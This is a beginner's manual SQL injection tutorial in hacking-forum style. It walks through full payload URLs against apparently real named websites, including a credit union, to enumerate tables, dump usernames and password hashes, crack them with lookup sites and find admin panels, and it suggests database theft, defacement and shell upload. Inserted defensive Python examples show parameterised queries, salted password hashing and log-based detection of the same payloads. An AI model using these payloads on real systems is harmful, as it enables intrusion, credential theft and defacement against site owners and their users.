Hello everyone, today I will be giving you a guide to SQL Injection using the basics of manual injection. I will provide pictures, examples, step by step parts, tools and much more. So let's get started.
Tools you can use:
- Google Dorks (For finding vulnerable websites)
- MD5 Decrypter (Decrypting passwords in tables)
- Hash Cracker (Backup decrypter)
- Admin Page Finder #1 (Find admin page to login to)
- Admin Page Finder #2 (Backup admin page finder)
- String to ASCII Chart (For the part where you need to enter the column in ASCII)
Tutorial:
Okay so let's start by choosing a website, it must end with "ID=NUMBER". That is the SQLi vulnerability.
I will be choosing this site
Code:
http://calidus.ro/en/news.php?id=2
Now to test if the website is actually vulnerable, you just need to add an apostrophe to the end of it, so it looks like this:
Code:
http://calidus.ro/en/news.php?id=2'
and you should get a MySQL Error which is a good thing.
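Why that apostrophe produces a MySQL error, and what stops it, is easiest to see in code. The following is an added example, not part of the original tutorial: a toy news lookup in Python using an in-memory SQLite table with constructed sample rows. One handler builds the query by string concatenation the way a vulnerable news.php does, the other validates the id as an integer and binds it as a parameter. The payloads are the ones from this tutorial; SQLite is used so the example runs offline, so the MySQL-only pieces (@@version, information_schema) are not exercised here.

```python
import sqlite3

# Constructed in-memory stand-in for the site's news table. It has four
# columns, which is why "order by 5" errors and "union select 1,2,3,4" lines up.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
INSERT INTO news VALUES (1, 'First post', 'Hello', 'admin');
INSERT INTO news VALUES (2, 'Second post', 'World', 'editor');
"""


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_news_vulnerable(id_param):
    """Builds the query by string concatenation, the defect behind the
    news.php?id=... pages in the tutorial: whatever follows id= becomes SQL."""
    conn = _connect()
    sql = "SELECT id, title, body, author FROM news WHERE id = " + id_param
    try:
        return conn.execute(sql).fetchall()
    finally:
        conn.close()


def get_news_safe(id_param):
    """Validates the id as an integer and binds it as a parameter, so the
    value can only ever be compared against the column, never parsed as SQL."""
    try:
        news_id = int(id_param)  # "2'" or "null union ..." -> ValueError
    except ValueError:
        raise ValueError("id must be an integer")
    conn = _connect()
    try:
        return conn.execute(
            "SELECT id, title, body, author FROM news WHERE id = ?", (news_id,)
        ).fetchall()
    finally:
        conn.close()


def probe(handler, id_param):
    """Returns ('rows', rows) or ('error', message) so both handlers can be
    compared on the same input without the example crashing."""
    try:
        return ("rows", handler(id_param))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    for payload in ["2", "2'", "2 order by 5--", "2 order by 4--",
                    "null union select 1,2,3,4--"]:
        print(repr(payload))
        print("  vulnerable:", probe(get_news_vulnerable, payload))
        print("  safe:      ", probe(get_news_safe, payload))
```

The concatenated version reports a syntax error for the apostrophe, an "ORDER BY term out of range" error for order by 5, and returns the row 1,2,3,4 for the union payload, which is exactly the behaviour the tutorial relies on. The parameterised version rejects every one of those inputs before a query is built, and even without the integer check a bound value is compared as data, not executed.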
Finding amount of Columns
Now you are going to want to find the amount of columns, and you can do this by removing the apostrophe at the end and adding this to the end of your link:
Code:
+order+by+(number)--
Enter any number from 1-15. If you get an error, keep lowering the number until you don't, and vice versa. Find the number where, if you go one higher, you will get an error. So I will put
Code:
http://calidus.ro/en/news.php?id=2+order+by+5--
and I get an error, so I will lower it by one and the page loads perfectly. That number is the amount of columns on the site.
Gathering vulnerable columns
Now we want to find which columns are vulnerable, so we will do this: take out all the stuff on the link that comes after id=2 and replace it with this code:
Code:
+union+select+1,2,3,4--
Now in my case it's 1,2,3,4 because I have four columns; you change yours to how many columns you have and remember to add the "--" at the end. Also change ID=2 to either "Id=-2" or "Id=null" and your link should look like this:
Code:
http://calidus.ro/en/news.php?id=null+union+select+1,2,3,4--
but remember to change the column amount to yours!
Press enter and you will get a number or two; these are the vulnerable columns. Now the MySQL version MUST be above 5 for this to work.
Checking MySQL Version
Next we will find the MySQL version of the columns, so pick one of the numbers that showed up on the site and look for it in your URL bar, then replace it with this code:
Code:
@@version
So your link should look like this
Code:
http://calidus.ro/en/news.php?id=null+union+select+1,2,3,@@version--
(You can do whatever number you like, as long as it's vulnerable.)
The @@version code makes the website display its MySQL version.
Retrieving Table Names
After that, we will find the table names and for this you need some codes:
Code:
group_concat(table_name,0x0a)
Code:
from+information_schema.tables
Code:
+where+table_schema=database()--
The 0x0a breaks the line between each table for easier viewing.
So you are now supposed to choose a vulnerable column and replace it with 'group_concat(table_name,0x0a)' and then add the last two codes in at the end.
Your link should look something like this:
Code:
http://calidus.ro/en/news.php?id=null+union+select+1,2,3,group_concat(table_name,0x0a)+from+information_schema.tables+where+table_schema=database()--
Look for the "Users" table, or something like that, that's what you need.
Getting Column names from Tables
Now we will retrieve the column names from the tables. We are looking for the account info from the "users" table, but first we need the columns.
We will need to replace some code, so look for "group_concat(table_name,0x0a)" and replace (table_name,0x0a) with (column_name,0x0a).
Look for 'information_schema.tables' and replace 'tables' with 'columns'.
Finally, delete all the text after 'information_schema.columns' and in front of it add
Code:
where+table_name=char(ASCII CODE)
But wait, that won't work. This could be because of one of two reasons: one, you are copying directly from my tutorial and the table on your website is not called users, and two, you need to use ASCII. So go to your website and find the table that you think is the users table. It could be "Admin_Login" or anything like that. Once you find it, use the String to ASCII link provided in the Links section to convert your table name to ASCII. It should come up like this "123 456 789". You must change it to "(123,456,789)" by adding commas where the spaces were and brackets on both sides. So you need to do the steps above but replace "ASCII CODE" with your table name in ASCII. Mine would be something like this "117,115,101,114,115".
Extracting Data from Columns
Great, now we have the columns in the 'users' table. We now need the account info, so look for the important columns you need, which can be "User ID", "ID", "User_Password", "Password" etc.
This means you must change the previous 'group_concat' to something like this
Code:
group_concat(user_ID,0x3a,username,0x3a,user_password,0x0a)
Then, delete everything after '+from' and replace it with this code
Code:
+users--
So your link should look a little like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+users--
Decrypting Account Detail Hashes
Finally, you should get some weird strings maybe mixed with text; that means the passwords are encrypted, mostly using MD5. So we want to go to this website: http://www.md5decrypt.org/
Then you want to enter the strings one by one. If MD5 doesn't work, try the other options like 'MD4', 'SHA1', etc.
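Why an MD5 lookup site works on these strings, and what a site should be storing instead, as an added example that is not part of the original tutorial (Python, standard library only; the account names and passwords are constructed): unsalted MD5 maps every copy of a common password to one well-known constant, so a precomputed table answers it instantly, whereas a per-user random salt plus a slow key derivation function (PBKDF2-HMAC-SHA256 here, with the 600,000 iterations OWASP recommends) gives every account a different, expensive-to-recompute string.

```python
import hashlib
import hmac
import os

# Constructed sample: two accounts that happen to share the same password.
ACCOUNTS = {"alice": "Summer2014", "bob": "Summer2014"}


def md5_store(password):
    """What the tutorial's targets did: one deterministic, unsalted MD5 per
    password. Two users with the same password get the same string, and any
    common password's hash is already in a lookup table."""
    return hashlib.md5(password.encode()).hexdigest()


def pbkdf2_store(password, salt=None, iterations=600_000):
    """Per-user random salt plus a deliberately slow KDF.
    Stored as salt$iterations$hash so the parameters travel with the record."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${digest.hex()}"


def pbkdf2_verify(password, stored):
    """Recomputes with the stored salt and iteration count and compares in
    constant time, so timing does not leak how many bytes matched."""
    salt_hex, iterations, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def md5_collides(a, b):
    """True when two passwords produce identical stored MD5 strings."""
    return md5_store(a) == md5_store(b)


def pbkdf2_collides(a, b):
    """False even for identical passwords, because each call draws a new salt."""
    return pbkdf2_store(a) == pbkdf2_store(b)


if __name__ == "__main__":
    for user, pw in ACCOUNTS.items():
        print(user, "md5:   ", md5_store(pw))
        print(user, "pbkdf2:", pbkdf2_store(pw))
```

Run it twice and the MD5 column is identical both times and for both users; the PBKDF2 column differs every run. The verify step is what the login page calls, and it costs the same fraction of a second whether the guess is right or wrong, which is what makes bulk guessing against a leaked table impractical.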
Finding Admin Login Page
You finally have the user and password for the website, now what? You will need to find a page for you to log in to for admin access. For this you will be using an Admin Panel Finder; I have provided multiple links for them at the top of this tutorial, but I'll post the best here: http://sc0rpion.ir/
There, you've found your admin page and the admin login details, now you can do stuff like steal their DB, upload your deface page, upload a shell, and a lot more.
String Based Injection
Now if that first guide did not work, there may be a quick fix for your problem. If nothing happens when you type "union+select+1,3,3,7--" or whatever number, there is a fix and it's called String Based Injection. Basically what you do is this: if the ID was null, change it to -(number) and add an apostrophe back in front of it, so -69' would be an example. Then at the end where it says "--" you must change that to "--+-". If the tables are still not showing up, your numbers are not going high enough or the site is not vulnerable.
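Every step of this walkthrough leaves a distinctive query string in the web server's access log, so the same sequence is straightforward to spot from the defending side. The following is an added example, not part of the original tutorial: a Python script with constructed Apache-style log lines that replay the tutorial's requests (the apostrophe, order by, union select, @@version, information_schema, group_concat, char(...) and the string-based --+- variant), URL-decodes each query parameter, tags the technique each one matches, and decodes char(117,115,101,114,115) back to "users" so the analyst can read the targeted table. The regular expressions, tag names and sample addresses are my own choices.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache-style access log lines (not real traffic) replaying the
# tutorial's probes against a news.php page. Note the "+" in the query string,
# which the web server decodes to a space.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2014:13:55:36 +0000] "GET /en/news.php?id=2 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2014:13:55:41 +0000] "GET /en/news.php?id=2' HTTP/1.1" 500 312
203.0.113.5 - - [10/Oct/2014:13:55:52 +0000] "GET /en/news.php?id=2+order+by+5-- HTTP/1.1" 500 312
203.0.113.5 - - [10/Oct/2014:13:56:03 +0000] "GET /en/news.php?id=null+union+select+1,2,3,@@version-- HTTP/1.1" 200 5210
203.0.113.5 - - [10/Oct/2014:13:56:20 +0000] "GET /en/news.php?id=null+union+select+1,2,3,group_concat(column_name,0x0a)+from+information_schema.columns+where+table_name=char(117,115,101,114,115)-- HTTP/1.1" 200 5300
203.0.113.5 - - [10/Oct/2014:13:56:40 +0000] "GET /en/news.php?id=-69'+union+select+1,2,3,4--+- HTTP/1.1" 200 5100
198.51.100.7 - - [10/Oct/2014:13:57:01 +0000] "GET /en/news.php?id=3 HTTP/1.1" 200 5090
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# One pattern per step of the walkthrough, applied to the URL-decoded value
# of each query parameter (so "+" has already become a space).
SIGNATURES = {
    "quote-appended-to-numeric-id": re.compile(r"^-?\d+'"),
    "column-count-probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "version-fingerprint": re.compile(r"@@version", re.I),
    "schema-enumeration": re.compile(r"information_schema\.(tables|columns)", re.I),
    "data-concatenation": re.compile(r"\bgroup_concat\s*\(", re.I),
    "char-encoded-literal": re.compile(r"\bchar\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I),
    "comment-terminator": re.compile(r"--\s*-?\s*$"),
}


def decode_char_literal(numbers):
    """'117,115,101,114,115' -> 'users': the table name the request targets."""
    return "".join(chr(int(n)) for n in numbers.split(","))


def analyze_line(line):
    """Returns a finding dict for a line matching at least one signature, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("path")).query
    tags, literals = [], []
    for _name, value in parse_qsl(query, keep_blank_values=True):
        for tag, pattern in SIGNATURES.items():
            hit = pattern.search(value)
            if not hit:
                continue
            tags.append(tag)
            if tag == "char-encoded-literal":
                literals.append(decode_char_literal(hit.group(1)))
    if not tags:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
            "query": query, "tags": tags, "decoded_literals": literals}


def analyze_log(text):
    """Runs analyze_line over every line and keeps only the findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


def summarize(findings):
    """Findings per source address, the first thing to pivot on in triage."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for f in hits:
        print(f["ts"], f["ip"], f["status"], f["tags"], f["decoded_literals"])
    print(summarize(hits))
```

Pass real access-log text to analyze_log to use it. The 500s on the apostrophe and order-by lines followed by 200s on the union lines are the progression the tutorial describes, and grouping by address makes that sequence obvious even when each individual request looks like noise; a lone "order by" hit can be a legitimate sort parameter, so treat the per-address count and the presence of information_schema or @@version as the stronger signals.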
Thank you everyone for reading my basic SQL Injection tutorial for beginners, I hope you enjoyed and more to come soon!